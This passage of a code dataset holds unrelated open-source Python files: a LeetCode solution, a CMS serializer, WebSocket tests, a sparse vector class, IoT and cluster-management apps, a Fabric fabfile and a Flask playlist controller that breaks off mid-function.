id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
1763606 | <filename>easy/1374-Generate a String With Characters That Have Odd Counts.py
"""
https://leetcode.com/problems/generate-a-string-with-characters-that-have-odd-counts/
Given an integer n, return a string with n characters such that each character in such string occurs an odd number of times.
The returned string must contain only lowercase English letters. If there are multiples valid strings, return any of them.
Example 1:
Input: n = 4
Output: "pppz"
Explanation: "pppz" is a valid string since the character 'p' occurs three times and the character 'z' occurs once. Note that there are many other valid strings such as "ohhh" and "love".
Example 2:
Input: n = 2
Output: "xy"
Explanation: "xy" is a valid string since the characters 'x' and 'y' occur once. Note that there are many other valid strings such as "ag" and "ur".
Example 3:
Input: n = 7
Output: "holasss"
Constraints:
1 <= n <= 500
"""
# time complexity: O(n), space complexity: O(1)
class Solution:
    def generateTheString(self, n: int) -> str:
        """Return an n-character string in which every character occurs an
        odd number of times.

        Odd n: one letter repeated n times is already odd.
        Even n: n-1 copies of 'a' (odd) plus a single 'b' (odd).
        Time O(n), extra space O(1) beyond the result.
        """
        if n % 2:
            return 'a' * n
        return 'a' * (n - 1) + 'b'
| StarcoderdataPython |
3292458 | <gh_stars>1-10
"""serialization module.
Classes provided include:
:class:`ResourceFactory` - Factory for generating :class:`.resources.Resource` subclasses out of JSON data.
"""
from .fields import Boolean, Date, Number, Object, Symbol, Text, List, MultipleAssets, MultipleEntries
from .resources import ResourceType, Array, Entry, Asset, Space, ContentType, ResourceLink
from dateutil import parser
import ast
import copy
class ResourceFactory(object):
    """Factory for generating :class:`.resources.Resource` subclasses out of JSON data.
    Attributes:
      entries_mapping (dict): Mapping of Content Type IDs to custom Entry subclasses.
    """
    def __init__(self, custom_entries):
        """ResourceFactory constructor.
        :param custom_entries: list of custom Entry subclasses.
        :return: ResourceFactory instance.
        """
        super(ResourceFactory, self).__init__()
        # Index the custom Entry subclasses by their declared Content Type ID
        # so create_entry() can instantiate the matching subclass.
        self.entries_mapping = {}
        if custom_entries is not None:
            for c in custom_entries:
                ct = c.__content_type__
                self.entries_mapping[ct] = c
    def from_json(self, json):
        """Create resource out of JSON data.
        :param json: JSON dict.
        :return: Resource with a type defined by the given JSON data.
        """
        # Dispatch on the resource type recorded in the `sys` metadata block.
        # NOTE(review): unknown types fall through and return None implicitly.
        res_type = json['sys']['type']
        if ResourceType.Array.value == res_type:
            return self.create_array(json)
        elif ResourceType.Entry.value == res_type:
            return self.create_entry(json)
        elif ResourceType.Asset.value == res_type:
            return ResourceFactory.create_asset(json)
        elif ResourceType.ContentType.value == res_type:
            return ResourceFactory.create_content_type(json)
        elif ResourceType.Space.value == res_type:
            return ResourceFactory.create_space(json)
    @staticmethod
    def _extract_link(obj):
        # Return a ResourceLink when `obj` is a JSON link structure, else None.
        if not isinstance(obj, dict):
            return None
        sys = obj.get('sys')
        if isinstance(sys, dict) and sys.get('type') == ResourceType.Link.value:
            return ResourceLink(sys)
        return None
    def create_entry(self, json):
        """Create :class:`.resources.Entry` from JSON.
        :param json: JSON dict.
        :return: Entry instance.
        """
        sys = json['sys']
        ct = sys['contentType']['sys']['id']
        fields = json['fields']
        # Keep an untouched copy before links are replaced in-place below.
        raw_fields = copy.deepcopy(fields)
        # Replace links with :class:`.resources.ResourceLink` objects.
        for k, v in fields.items():
            link = ResourceFactory._extract_link(v)
            if link is not None:
                fields[k] = link
            elif isinstance(v, list):
                # Also resolve links nested one level deep inside list fields.
                for idx, ele in enumerate(v):
                    link = ResourceFactory._extract_link(ele)
                    if link is not None:
                        v[idx] = link
        if ct in self.entries_mapping:
            # A custom Entry subclass is registered for this content type:
            # populate its declared fields with type-converted values.
            clazz = self.entries_mapping[ct]
            result = clazz()
            for k, v in clazz.__entry_fields__.items():
                field_value = fields.get(v.field_id)
                if field_value is not None:
                    setattr(result, k, ResourceFactory.convert_value(field_value, v))
        else:
            result = Entry()
        result.sys = sys
        result.fields = fields
        result.raw_fields = raw_fields
        return result
    @staticmethod
    def create_asset(json):
        """Create :class:`.resources.Asset` from JSON.
        :param json: JSON dict.
        :return: Asset instance.
        """
        result = Asset(json['sys'])
        file_dict = json['fields']['file']
        result.fields = json['fields']
        result.url = file_dict['url']
        result.mimeType = file_dict['contentType']
        return result
    @staticmethod
    def create_content_type(json):
        """Create :class:`.resource.ContentType` from JSON.
        :param json: JSON dict.
        :return: ContentType instance.
        """
        result = ContentType(json['sys'])
        # Key each field definition by its id; the id key itself is removed
        # (this mutates the field dicts of the input JSON).
        for field in json['fields']:
            field_id = field['id']
            del field['id']
            result.fields[field_id] = field
        result.name = json['name']
        result.display_field = json.get('displayField')
        return result
    @staticmethod
    def create_space(json):
        """Create :class:`.resources.Space` from JSON.
        :param json: JSON dict.
        :return: Space instance.
        """
        result = Space(json['sys'])
        result.name = json['name']
        return result
    @staticmethod
    def convert_value(value, field):
        """Given a :class:`.fields.Field` and a value, ensure that the value matches the given type, otherwise
        attempt to convert it.
        :param value: field value.
        :param field: :class:`.fields.Field` instance.
        :return: Result value.
        """
        clz = field.field_type
        if clz is Boolean:
            if not isinstance(value, bool):
                return bool(value)
        elif clz is Date:
            # Dates are always parsed into datetime objects via dateutil.
            if not isinstance(value, str):
                value = str(value)
            return parser.parse(value)
        elif clz is Number:
            # NOTE(review): int(value) truncates floats — confirm Number
            # fields are guaranteed integral before relying on this.
            if not isinstance(value, int):
                return int(value)
        elif clz is Object:
            # String payloads are parsed as Python literals.
            if not isinstance(value, dict):
                return ast.literal_eval(value)
        elif clz is Text or clz is Symbol:
            if not isinstance(value, str):
                return str(value)
        elif clz is List or clz is MultipleAssets or clz is MultipleEntries:
            # Scalars are promoted to single-element lists.
            if not isinstance(value, list):
                return [value]
        # No need to convert :class:`.fields.Link` types as the expected value
        # should be of type :class:`.resources.ResourceLink` for links.
        return value
    # Array
    def process_array_items(self, array, json):
        """Iterate through all `items` and create a resource for each.
        In addition map the resources under the `items_mapped` by the resource id and type.
        :param array: Array resource.
        :param json: Raw JSON dictionary.
        """
        for item in json['items']:
            key = None
            processed = self.from_json(item)
            if isinstance(processed, Asset):
                key = 'Asset'
            elif isinstance(processed, Entry):
                key = 'Entry'
            if key is not None:
                array.items_mapped[key][processed.sys['id']] = processed
            array.items.append(processed)
    def process_array_includes(self, array, json):
        """Iterate through all `includes` and create a resource for every item.
        In addition map the resources under the `items_mapped` by the resource id and type.
        :param array: Array resource.
        :param json: Raw JSON dictionary.
        """
        includes = json.get('includes') or {}
        for key in array.items_mapped.keys():
            if key in includes:
                for resource in includes[key]:
                    processed = self.from_json(resource)
                    array.items_mapped[key][processed.sys['id']] = processed
    def create_array(self, json):
        """Create :class:`.resources.Array` from JSON.
        :param json: JSON dict.
        :return: Array instance.
        """
        result = Array(json['sys'])
        result.total = json['total']
        result.skip = json['skip']
        result.limit = json['limit']
        result.items = []
        result.items_mapped = {'Asset': {}, 'Entry': {}}
        self.process_array_items(result, json)
        self.process_array_includes(result, json)
return result | StarcoderdataPython |
65886 | # -*- coding: utf-8 -*-
# pip install pdfminer.six -i https://pypi.doubanio.com/simple
import io
import sys

from pdfminer.high_level import *
# Re-wrap stdout as UTF-8 so extracted non-ASCII text prints without encoding errors.
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
def return_txt():
    """Extract all text from the PDF named by the first CLI argument and print it."""
    # NOTE(review): no argument-count check — raises IndexError when run without a file name.
    name = sys.argv[1]
    text = extract_text(name)
    print(text)
if __name__ == '__main__':
return_txt() | StarcoderdataPython |
93635 | import pytest
from asgiref.sync import sync_to_async
from channels.testing import WebsocketCommunicator
from realtime_api.testing import AuthWebsocketCommunicator, create_user
from realtime_api.utils import get_group_user_key, close_user_channels
from .consumers import GroupTestConsumer
def test_group_does_not_exist():
    """Closing channels for an unknown user key is a silent no-op."""
    result = close_user_channels('some-pk')
    assert result is None
def test_get_group_user_name():
    """The group key is the '.user' prefix followed by the raw user key."""
    cases = [('', '.user'), (35, '.user35'), ('key', '.userkey')]
    for user_key, expected in cases:
        assert get_group_user_key(user_key) == expected
@pytest.mark.asyncio
async def test_close_user_channels_authenticated(user):
    # Open one authenticated socket, close all channels for that user, and
    # verify the consumer reports the close event to the client.
    communicator = await AuthWebsocketCommunicator(
        GroupTestConsumer,
        '/',
        user=user,
    )
    connected, subprotocol = await communicator.connect()
    assert connected
    # close_user_channels is synchronous; run it off the event loop.
    await sync_to_async(close_user_channels)(user.pk)
    response = await communicator.receive_from()
    assert response == 'Socket closes with code 3'
@pytest.mark.asyncio
async def test_close_user_channels_no_user():
    # An empty user key targets the unauthenticated (anonymous) group.
    communicator = WebsocketCommunicator(GroupTestConsumer, '/')
    connected, subprotocol = await communicator.connect()
    assert connected
    await sync_to_async(close_user_channels)('')
    response = await communicator.receive_from()
    assert response == 'Socket closes with code 3'
@pytest.mark.asyncio
async def test_close_user_channels_multiple_connections(user):
    """close_user_channels(pk) closes every socket of that user and no other;
    the empty key closes only the sockets opened without a user.

    receive_nothing(t) is True when no message arrived within t seconds, so
    `not receive_nothing(...)` asserts that a close notification IS pending.
    """
    user2 = await create_user('Simon')
    user3 = await create_user('Mary')
    c_u11 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user)
    c_u12 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user)
    c_u13 = await AuthWebsocketCommunicator(GroupTestConsumer, 't', user=user)
    c_u21 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user2)
    c_u22 = await AuthWebsocketCommunicator(GroupTestConsumer, '/', user=user2)
    c_u31 = await AuthWebsocketCommunicator(GroupTestConsumer, 't', user=user3)
    c_u32 = await AuthWebsocketCommunicator(GroupTestConsumer, 't', user=user3)
    c_n1 = await AuthWebsocketCommunicator(GroupTestConsumer, '/')
    c_n2 = WebsocketCommunicator(GroupTestConsumer, '/')
    c_n3 = WebsocketCommunicator(GroupTestConsumer, 't')
    communicators = [c_u11, c_u12, c_u13, c_u21, c_u22, c_u31, c_u32,
                     c_n1, c_n2, c_n3]
    for communicator in communicators:
        connected, subprotocol = await communicator.connect()
        # Fix: the original discarded `connected` on all ten connects; a failed
        # handshake would only surface later as a confusing receive timeout.
        assert connected
    await sync_to_async(close_user_channels)(user.pk)
    # Only `user`'s three sockets receive the close notification.
    assert not await c_u11.receive_nothing(0.02)
    assert not await c_u12.receive_nothing(0.02)
    assert not await c_u13.receive_nothing(0.02)
    assert await c_u21.receive_nothing(0.02)
    assert await c_u22.receive_nothing(0.02)
    assert await c_u31.receive_nothing(0.02)
    assert await c_u32.receive_nothing(0.02)
    assert await c_n1.receive_nothing(0.02)
    assert await c_n2.receive_nothing(0.02)
    assert await c_n3.receive_nothing(0.02)
    r1 = await c_u11.receive_from()
    r2 = await c_u12.receive_from()
    r3 = await c_u13.receive_from()
    assert r1 == r2 == r3 == 'Socket closes with code 3'
    # The empty key targets only the connections opened without a user.
    await sync_to_async(close_user_channels)('')
    assert await c_u11.receive_nothing(0.02)
    assert await c_u12.receive_nothing(0.02)
    assert await c_u13.receive_nothing(0.02)
    assert await c_u21.receive_nothing(0.02)
    assert await c_u22.receive_nothing(0.02)
    assert await c_u31.receive_nothing(0.02)
    assert await c_u32.receive_nothing(0.02)
    assert not await c_n1.receive_nothing(0.02)
    assert not await c_n2.receive_nothing(0.02)
    assert not await c_n3.receive_nothing(0.02)
    r1 = await c_n1.receive_from()
    r2 = await c_n2.receive_from()
    r3 = await c_n3.receive_from()
    assert r1 == r2 == r3 == 'Socket closes with code 3'
    await c_u21.disconnect()
    await c_u22.disconnect()
    await c_u31.disconnect()
    await c_u32.disconnect()
| StarcoderdataPython |
1657322 | from distutils.core import setup
from setuptools import find_packages
# Read the long description up front so the file handle is closed promptly
# (the original inline `open("README.rst").read()` leaked the file object).
with open("README.rst") as readme_file:
    long_description = readme_file.read()

setup(
    name="pandasql3",
    version="0.7.3",
    author="<NAME>",
    author_email="<EMAIL>",
    url="https://github.com/dunakeyr/pandasql3/",
    license="MIT",
    packages=find_packages(),
    package_dir={"pandasql": "pandasql"},
    # Ship the bundled example CSV data with the package.
    package_data={"pandasql": ["data/*.csv"]},
    description="sqldf for pandas",
    long_description=long_description,
    install_requires=['numpy', 'pandas', 'sqlalchemy'],
    classifiers=[
        "License :: OSI Approved :: MIT License",
    ],
)
| StarcoderdataPython |
1609410 | <reponame>shashankrnr32/pytkdocs<filename>tests/fixtures/unwrap_getattr_raises.py
class TryMe:
    """Fixture object whose every (missing) attribute access raises ValueError."""

    def __getattr__(self, item):
        raise ValueError


# Module-level instance used by the tests.
TRY_ME = TryMe()
| StarcoderdataPython |
4811562 | <gh_stars>0
from fabric.api import env, run, sudo, put
import collections
import json
import requests
# Discover cluster nodes from the Optica inventory service and group them by role.
# NOTE(review): `optica_ip` is not defined in this file — presumably injected
# elsewhere (fabfile globals/execfile); confirm before running.
# NOTE: Python 2 fabfile (uses print statements below).
response = requests.get('http://%s:8080/' % optica_ip)
hosts = json.loads(response.text)
# fill the role list
env.roledefs = collections.defaultdict(lambda: [])
for hostinfo in hosts['nodes'].values():
    env.roledefs[hostinfo['role']].append(hostinfo['hostname'])
# show the roll list if no role selected
if not env.roles:
    print "Available roles:\n"
    for role in sorted(env.roledefs.keys()):
        count = len(env.roledefs[role])
        print " %-30s %3d machine%s" % (role, count, "s" if count > 1 else "")
    print ""
def uptime():
    """Check the uptime on a node"""
    # Runs `uptime` on each host selected via the fabric role.
    run('uptime')
def restart_service(service_name):
    """Restart a named system service on the selected hosts.

    Example: `fab restart_service:nginx`.
    """
    command = 'service %s restart' % service_name
    sudo(command)
| StarcoderdataPython |
1685862 | '''
sparse vector based on defaultdict
Modifications for Python 3 made by <NAME>
'''
__author__ = "lhuang"
from collections import defaultdict
class svector(defaultdict):
    """Sparse vector: a float-defaulting dict with vector arithmetic.

    Missing components read as 0.0. Arithmetic operators return new vectors
    except the in-place forms (+=, -=), which mutate the receiver.
    """

    def __init__(self, old=None):
        # Optionally seed the vector from an existing mapping.
        if old is None:
            defaultdict.__init__(self, float)
        else:
            defaultdict.__init__(self, float, old)

    def __iadd__(self, other):
        """In-place addition: fold every component of `other` into self."""
        for key, weight in other.items():
            self[key] += weight
        return self

    def __add__(self, other):
        """Return a new vector holding the component-wise sum."""
        total = svector(self)
        for key, weight in other.items():
            total[key] += weight
        return total

    def __sub__(self, other):
        """Return a new vector: self - other."""
        return self + other * (-1)

    def __isub__(self, other):
        """In-place subtraction."""
        self += other * (-1)
        return self

    def __mul__(self, scalar):
        """Return a new vector with every component scaled by `scalar`."""
        scaled = svector()
        for key, weight in self.items():
            scaled[key] = weight * scalar
        return scaled

    __rmul__ = __mul__  # scalar * vector

    def dot(self, other):
        """Sparse dot product, iterating over the smaller vector."""
        small, big = (self, other) if len(self) < len(other) else (other, self)
        return sum(weight * big[key] for key, weight in small.items())

    def __neg__(self):
        """Return a new vector with every component negated."""
        flipped = svector()
        for key, weight in self.items():
            flipped[key] = -weight
        return flipped

    def copy(self):
        """Return a shallow copy that is itself an svector."""
        return svector(self)
| StarcoderdataPython |
3249943 | #####
#
# This class is part of the Programming the Internet of Things
# project, and is available via the MIT License, which can be
# found in the LICENSE file at the top level of this repository.
#
# You may find it more helpful to your design to adjust the
# functionality, constants and interfaces (if there are any)
# provided within in order to meet the needs of your specific
# Programming the Internet of Things project.
#
# Import logging and setup it
import logging,logging.config
logging.config.fileConfig("logging.conf")
from time import sleep
from programmingtheiot.common import ConfigConst
from programmingtheiot.common.ConfigUtil import ConfigUtil
from programmingtheiot.cda.app.DeviceDataManager import DeviceDataManager
from programmingtheiot.cda.system.SystemPerformanceManager import SystemPerformanceManager
class ConstrainedDeviceApp():
    """
    Definition of the ConstrainedDeviceApp class.

    Thin lifecycle wrapper around DeviceDataManager: construct, start, stop.
    """
    def __init__(self):
        """
        Initialization of class.
        Create DeviceDataManager instance.
        """
        logging.info("Initializing CDA...")
        self.devDataManager = DeviceDataManager()
    def startApp(self):
        """
        Start the CDA:
        Start DeviceDataManager.
        """
        logging.info("Starting CDA...")
        self.devDataManager.startManager()
        logging.info("CDA started.")
    def stopApp(self, code: int):
        """
        Stop the CDA.
        Stop DeviceDataManager.

        :param code: exit code to report in the shutdown log message.
        """
        logging.info("CDA stopping...")
        self.devDataManager.stopManager()
        logging.info("CDA stopped with exit code %s.", str(code))
    def parseArgs(self, args):
        """
        Parse command line args.
        @param args The arguments to parse.
        """
        # NOTE(review): stub — arguments are currently logged but never parsed.
        logging.info("Parsing command line args...")
def main():
    """
    Main function definition for running client as application.
    Current implementation runs for 65 seconds then exits.

    A negative configured run time means "run forever" (block on an empty
    asyncio event loop); otherwise sleep for run_time seconds and stop.
    """
    run_time = ConfigUtil().getInteger(ConfigConst.CONSTRAINED_DEVICE,ConfigConst.TEST_CDA_RUN_TIME_KEY,-1)
    cda = ConstrainedDeviceApp()
    cda.startApp()
    import asyncio
    if run_time < 0:
        # Block indefinitely; the loop has no tasks, it only keeps the process alive.
        loop = asyncio.get_event_loop()
        try:
            loop.run_forever()
        finally:
            loop.close()
    else:
        sleep(run_time)
        cda.stopApp(0)
# Script entry point.
if __name__ == '__main__':
    """
    Attribute definition for when invoking as app via command line
    """
    main()
| StarcoderdataPython |
4829338 | <gh_stars>0
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""The main part of the cluster framework.
The Master Class to create, maintain distribute framework and distribute
calculate tasks.
"""
import os
import sys
import copy
import logging
import time
import traceback
from queue import Queue
from ..trainer import utils
from .distribution import ClusterDaskDistributor, LocalDistributor
from vega.core.common import UserConfig, TaskOps
from vega.core.common.consts import ClusterMode
from .local_master import LocalMaster
from .worker_env import WorkerEnv
from .dask_env import DaskEnv
class Master(object):
    """The Master Class is to create, maintain distribute framework and distribute calculate tasks.
    :param argparse.ArgumentParser args: `args` is a argparse that should
        contain `init_method`, `rank` and `world_size`.
    :param Config cfg: `cfg`.
    """
    # Set externally before instantiation; handed to DaskEnv on startup.
    __master_path__ = None
    def __new__(cls):
        """Return a LocalMaster instance when run on local, else return a master instance."""
        mode = UserConfig().data.general.cluster_mode
        gpus = str(UserConfig().data.general.worker.gpus_per_job)
        if mode == ClusterMode.Single and gpus == "-1":
            # NOTE(review): if LocalMaster is not a Master subclass, Python
            # skips Master.__init__ for the returned object — confirm intended.
            return LocalMaster()
        else:
            return object.__new__(cls)
    def __init__(self):
        """Init master attrs, setup and start dask distributed cluster and local multiprocess pool."""
        self.cfg = copy.deepcopy(UserConfig().data.general)
        self.task_count = 0
        self.eval_count = self.cfg.worker.eval_count
        self.dask_env = DaskEnv(UserConfig().data.env,
                                self.__master_path__,
                                self.cfg.worker.gpus_per_job,
                                TaskOps(self.cfg).temp_path)
        status = self.dask_env.start()
        # Non-master (slave) processes terminate here; only the master continues.
        if not status or not self.dask_env.is_master:
            sys.exit(0)
        self._start_cluster()
        self._start_evaluator_multiprocess()
        # Finished-trainer pids.
        self.t_queue = Queue()
        # now save GPU and Dloop Evaluator result.
        self.e_queue = utils.PairDictQueue()
        return
    def _start_cluster(self):
        """Set and start dask distributed cluster."""
        self.md = ClusterDaskDistributor(self.dask_env.master_address)
        self.client = self.md.get_client()
        # Prefer the batch-scheduler-provided host name when available.
        local_host = None
        if "BATCH_CURRENT_HOST" in os.environ:
            local_host = os.environ["BATCH_CURRENT_HOST"]
        elif "BATCH_CUSTOM0_HOSTS" in os.environ:
            local_host = os.environ["BATCH_CUSTOM0_HOSTS"]
        plugin = WorkerEnv(self.dask_env.slave_proc_num,
                           self.dask_env.slave_gpus_per_proc,
                           local_host,
                           os.getpid(),
                           TaskOps(self.cfg).temp_path)
        self.client.register_worker_plugin(plugin)
        return
    def _start_evaluator_multiprocess(self):
        """Set and start local multiprocess pool."""
        self.dmd = LocalDistributor(self.eval_count)
        return
    @property
    def has_free_worker(self):
        """Property: check is has free dask worker.
        :return: return Ture if has free dask worker, otherwise return False.
        :rtype: bool
        """
        if self.md.process_queue_full():
            return False
        else:
            return True
    def run(self, worker):
        """Run a distributed_worker on different cluster.
        :param worker: A serializable object (callable and has `__call__`
            function) which need to be distributed calculaton.
        :type worker: object that the class was inherited from DistributedWorker.
        :return: the pid assigned to the worker (or None for EVALUATOR fan-out).
        """
        if worker is None:
            return
        if worker.worker_type == utils.WorkerTypes.EVALUATOR:
            # Evaluators fan out: run each sub-worker and register it in e_queue.
            for sub_worker in worker.sub_worker_list:
                self.run(sub_worker)
                self.e_queue.add_new("{}::{}".format(sub_worker.step_name, sub_worker.worker_id),
                                     sub_worker.worker_type.name)
        elif worker.worker_type == utils.WorkerTypes.HAVA_D_EVALUATOR:
            # D-loop evaluation runs in the local multiprocess pool.
            p_id = self.task_count
            if worker.step_name and worker.worker_id:
                logging.info("master run EVALUATE_DLOOP")
                p_id = "{0}::{1}::{2}".format(worker.worker_type.name,
                                              worker.step_name,
                                              worker.worker_id)
            self.dmd.distribute(pid=p_id, func=worker, kwargs={})
            return p_id
        else:
            # Everything else goes to the dask cluster; busy-wait for a free slot.
            finished = False
            while not finished:
                if not self.md.process_queue_full():
                    p_id = self.task_count
                    if worker.step_name is not None and worker.worker_id is not None:
                        p_id = "{0}::{1}::{2}".format(worker.worker_type.name,
                                                      worker.step_name,
                                                      worker.worker_id)
                    self.md.distribute(client=self.client, pid=p_id,
                                       func=worker, kwargs={})
                    self.task_count = self.task_count + 1
                    return p_id
                else:
                    time.sleep(0.1)
        return
    def join(self):
        """Wait all workers to finished."""
        self.md.join()
        self.dmd.join()
        return
    def update_status(self):
        """Update Master queue status.

        Pulls one finished pid from the dask result queue and one from the
        local evaluator pool, routing trainer pids to t_queue and evaluator
        pids to e_queue.
        NOTE(review): assumes result_queue_get() returns a None pid when
        nothing has finished — confirm it is non-blocking.
        """
        t_pid, _ = self.md.result_queue_get()
        if t_pid is not None:
            pid_splited = t_pid.split("::")
            if len(pid_splited) >= 3:
                type = pid_splited[0]
                pid = "{0}::{1}".format(pid_splited[1], pid_splited[2])
                if type == utils.WorkerTypes.TRAINER.name:
                    self.t_queue.put(pid)
                else:
                    self.e_queue.put(item=pid, type=type)
        dloop_pid = self.dmd.process_result_get()
        if dloop_pid is not None:
            pid_splited = dloop_pid.split("::")
            if len(pid_splited) >= 3:
                type = pid_splited[0]
                pid = "{0}::{1}".format(pid_splited[1], pid_splited[2])
                self.e_queue.put(item=pid, type=type)
        return
    def get_result_from_worker(self):
        """Get a result from a finished worker in dask cluster.
        :return: the pid and result of a finished worker if there are finished
            worker in queue, otherwise return(None, None).
        :rtype: (pid, result) or (None, None)
        """
        if not self.md.result_queue_empty():
            pid, result = self.md.result_queue_get()
            return pid, result
        else:
            return None, None
    def pop_finished_worker(self, train_worker=True):
        """Pop a finished dask worker's info, if there are finished dask worker in queue.
        :param train_worker: prefer popping a trainer pid when True; fall back
            to the evaluator queue otherwise.
        :return: the finished worker info, include step_name and worker_id.
            eg. {"step_name":"round1", "worker_id":1}
        :rtype: dict or None
        """
        self.update_status()
        pid = None
        if train_worker and not self.t_queue.empty():
            pid = self.t_queue.get()
        else:
            pid = self.e_queue.get()
        if pid is None:
            return None
        else:
            # pid format is "step_name::worker_id".
            pid_splited = pid.split("::")
            if len(pid_splited) < 2:
                return None
            else:
                return {"step_name": pid_splited[0],
                        "worker_id": pid_splited[1]}
    def pop_finished_train_worker(self):
        """Pop a finished evaluator worker's info, if there are finished evaluate workers in pool.
        :return: the finished worker info, include step_name and worker_id.
            eg. {"step_name":"round1", "worker_id":1}
        :rtype: dict or None
        """
        return self.pop_finished_worker(train_worker=True)
    def pop_finished_evaluate_worker(self):
        """Pop a finished evaluator worker's info, if there are finished evaluate workers in pool.
        :return: the finished worker info, include step_name and worker_id.
            eg. {"step_name":"round1", "worker_id":1}
        :rtype: dict or None
        """
        return self.pop_finished_worker(train_worker=False)
    def pop_all_finished_train_worker(self):
        """Pop all finished train worker's info.
        :return: a finished worker info list.
        :rtype: list of dict
        """
        worker_info_list = []
        finished_train_worker_info = self.pop_finished_train_worker()
        while finished_train_worker_info is not None:
            worker_info_list.append(finished_train_worker_info)
            finished_train_worker_info = self.pop_finished_train_worker()
        return worker_info_list
    def pop_all_finished_evaluate_worker(self):
        """Pop all finished evaluator worker's info.
        :return: a finished worker info list.
        :rtype: list of dict
        """
        worker_info_list = []
        finished_evaluate_worker_info = self.pop_finished_evaluate_worker()
        while finished_evaluate_worker_info is not None:
            worker_info_list.append(finished_evaluate_worker_info)
            finished_evaluate_worker_info = self.pop_finished_evaluate_worker()
        return worker_info_list
    def close_client(self):
        """Close cluster client."""
        if hasattr(self, "client") and self.client is not None:
            self.client.close()
            del self.client
    @staticmethod
    def shutdown():
        """Shutdown all distributed cluster."""
        mode = UserConfig().data.general.cluster_mode
        gpus = str(UserConfig().data.general.worker.gpus_per_job)
        if mode == ClusterMode.Single and gpus == "-1":
            # Local mode never started a cluster; nothing to shut down.
            return
        try:
            logging.info("Try to shutdown cluster.")
            from vega.core.trainer.utils import get_write_ip_master_local
            from distributed import Client
            ip, port = get_write_ip_master_local()
            if ip is None or port is None:
                logging.info("Stand-alone mode, no need to shut down the cluster.")
                return
            shutdown_client = Client("{}:{}".format(ip, port))
            logging.info("Cluster will be shut down.")
            shutdown_client.shutdown()
            shutdown_client.close()
            del shutdown_client
            logging.info("Cluster is shut down.")
        except Exception as e:
            # Best-effort shutdown: log and continue rather than crash the pipeline.
            logging.error("Pipeline's cluster shutdown error: {}".format(str(e)))
            logging.error(traceback.format_exc())
| StarcoderdataPython |
3315408 | <filename>crsf_drv/parse_serial.py<gh_stars>0
#!/usr/bin/env python3
from operator import contains
import os
from typing import Container, final
from crsf_parser import CRSFParser
from serial import Serial
def print_frame(frame: Container) -> None:
    """Callback for CRSFParser: print each parsed frame to stdout."""
    print(frame)
# Stream CRSF frames from the serial port, handing each parsed frame to the
# print_frame callback registered on the parser.
crsf_parser = CRSFParser(print_frame)
with Serial("/dev/ttyUSB0", 425000, timeout=2) as ser:
    # NOTE(review): `input` shadows the builtin, and the buffer is re-parsed
    # and never trimmed here — presumably CRSFParser consumes/tracks its own
    # offset; confirm, otherwise this grows without bound.
    input = bytearray()
    while True:
        values = ser.read(100)
        input.extend(values)
        crsf_parser.parse_stream(input)
| StarcoderdataPython |
71464 | from django.conf.urls import include, url
import django_eventstream
from . import views
# URL routes: site home, plus the django-eventstream SSE endpoints under /events/.
# NOTE(review): `django.conf.urls.url` was removed in Django 4.0; this file
# presumably targets an older Django — confirm before upgrading.
urlpatterns = [
    url(r'^$', views.home),
    url(r'^events/', include(django_eventstream.urls)),
]
| StarcoderdataPython |
3244564 | #################################################################
# falcon-player-controller-uploadr #
# Copyright (c) 2017 atomicnumber1 #
#################################################################
import os
import subprocess
import logging
import logging.handlers
from flask import Flask
from flask_restful import (reqparse, Api, Resource)
# Project layout: scripts/ holds the shell helpers invoked by the API,
# logs/ receives the rotating application log.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SCRIPTS_DIR = os.path.join(BASE_DIR, 'scripts')
LOG_FILENAME = os.path.join(BASE_DIR, 'logs', 'falcon_player_controller.log')
logger = logging.getLogger('FalconPlayerController')
logger.setLevel(logging.DEBUG)
# Add the log message handler to the logger (10 MB per file, 5 backups).
handler = logging.handlers.RotatingFileHandler(
    LOG_FILENAME, maxBytes=10*1024*1024, backupCount=5)
logger.addHandler(handler)
FPPApp = Flask(__name__)
FPPApi = Api(FPPApp)
# Action names advertised by the Info endpoint.
ACTIONS_SUPPORTED = [
    'start',
    'pause',
    'stop',
    'reboot',
    'shutdown'
]
# Numeric status codes embedded in every JSON response.
STATUS_CODES = {
    'Success': 0,
    'PlayError': 1,
    'PauseError': 2,
    'StopError': 3,
    'RebootError': 4,
    'ShutdownError': 5,
    'SSIDUpdated': 6,
    'SSIDNotUpdated': 7,
    'SSIDCheckError': 8,
    'SSIDUpdateError': 9,
}
def gen_response(status, msg):
    """Wrap a status code and payload in the uniform response envelope."""
    return dict(status=status, msg=msg)
# Info
# shows info about supported actions
class Info(Resource):
    """GET / — list the action names this API supports."""
    def get(self):
        return gen_response(STATUS_CODES['Success'], ACTIONS_SUPPORTED)
# Playlist
# performs the requested playlist actions
class Playlist(Resource):
    """REST resource mapping GET /<action>/<playlist> onto shell-script helpers."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Dispatch table: action name -> handler. Each handler takes the
        # playlist name (even where ignored) so get() can call them uniformly.
        self.actions = {
            'play': lambda x: self.play_playlist(x),
            'pause': lambda x: self.pause_playlist(),
            'stop': lambda x: self.stop_playlist(),
        }
        # Unknown actions fall back to listing the supported ones.
        self.default = lambda x: gen_response(STATUS_CODES['Success'], list(self.actions.keys()))
    def get(self, action, playlist):
        return self.actions.get(action, self.default)(playlist)
    def play_playlist(self, playlist):
        """Start the matching FPP playlist script; check_call blocks until it exits."""
        if playlist == 'audio':
            try:
                subprocess.check_call(['bash', '{}/StartAudioPlaylist.sh'.format(SCRIPTS_DIR)])
                return gen_response(STATUS_CODES['Success'], 'Playing Audio Playlist')
            except subprocess.CalledProcessError as e:
                logger.error('Error Occurred during execution of StartAudioPlaylist:\n{}'.format(e))
                return gen_response(STATUS_CODES['PlayError'], 'Ooops! Something\'s Wrong')
        elif playlist == 'video':
            try:
                subprocess.check_call(['bash', '{}/StartVideoPlaylist.sh'.format(SCRIPTS_DIR)])
                return gen_response(STATUS_CODES['Success'], 'Playing Video Playlist')
